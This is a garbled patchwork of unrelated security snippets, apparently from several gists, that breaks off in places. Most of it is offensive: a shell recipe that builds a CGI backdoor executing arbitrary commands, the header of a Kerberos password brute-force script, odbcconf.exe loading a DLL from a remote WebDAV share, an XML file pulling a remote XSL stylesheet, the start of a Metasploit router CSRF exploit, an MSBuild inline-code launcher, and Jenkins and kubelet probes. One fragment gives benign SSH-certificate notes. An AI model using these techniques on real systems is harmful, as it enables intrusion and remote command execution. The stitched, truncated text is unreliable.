jenkins_url + /api/json?tree=jobs[name,color]
jenkins_url + /job/${job_name}/api/json?tree=builds[number,status,timestamp,id,result]
curl -sk https://localhost:10250/pods/
If --anonymous-auth is turned off, you will see a 401 Unauthorized response.
If --anonymous-auth is true and --authorization-mode is Webhook, you'll see a 403 Forbidden response with the message Forbidden (user=system:anonymous, verb=get, resource=nodes, subresource=proxy).
If --anonymous-auth is true and --authorization-mode is AlwaysAllow, you'll see a list of pods.
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/6456162763d2bb427e71e41f84792867cb1b4c0f/xsl-notepad.xsl" ?>
<customers>
  <customer>
    <name>Microsoft</name>
  </customer>
</customers>
### I use HSM backed SSH certs and so can you. [why?: keys can be stolen, certs expire!]
1. Get a YubiHSM2 @ https://www.yubico.com/products/hardware-security-module/
2. Follow this: https://github.com/YubicoLabs/yubihsm-ssh-tool [Yes, you're going to have to install all the other yubico stuff too, yubico-connector, etc.] on your issuing machine, or airgapped machine.
3. Be content that you can now sign certificates with the HSM on the issuer/airgapped machine.
4. Update /etc/ssh/sshd_config on remote server to add:
    TrustedUserCAKeys /etc/ssh/ca.pub
    AuthorizedPrincipalsFile /etc/ssh/auth_principals/%u
5. Add principals here:
ex:
#!/bin/bash
# Title: kinit_brute.sh
# Author: @ropnop
# Description: This is a PoC for bruteforcing passwords using 'kinit' to try to check out a TGT from a Domain Controller
# The script configures the realm and KDC for you based on the domain provided and the domain controller
# Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf
# Only tested with Heimdal kerberos (error messages might be different for MIT clients)
# Note: this *will* lock out accounts if a domain lockout policy is set. Be careful
/*
To use with odbcconf.exe:
odbcconf /S /A {REGSVR odbcconf.dll}
or, from a remote location (if WebDAV support enabled):
odbcconf /S /A {REGSVR \\webdavaserver\dir\odbcconf.dll}
*/
using System;
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpServer::HTML
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'NetGear UPnP CSRF',
cd /tmp
mkdir cgi-bin
echo '#!/bin/bash' > ./cgi-bin/backdoor.cgi
echo 'echo -e "Content-Type: text/plain\n\n"' >> ./cgi-bin/backdoor.cgi
echo 'echo -e $($1)' >> ./cgi-bin/backdoor.cgi
chmod +x ./cgi-bin/backdoor.cgi
python -m http.server --cgi
By popular demand, here are my notes for running the demo I presented at Blackhat Arsenal 2017. These are not full instructions on how to set up the full environment; please let me know if you are interested in such a thing.
References:
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- This inline task executes c# code. -->
  <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml -->
  <Target Name="Hello">
    <SharpLauncher >
    </SharpLauncher>
  </Target>
  <UsingTask
    TaskName="SharpLauncher"
    TaskFactory="CodeTaskFactory"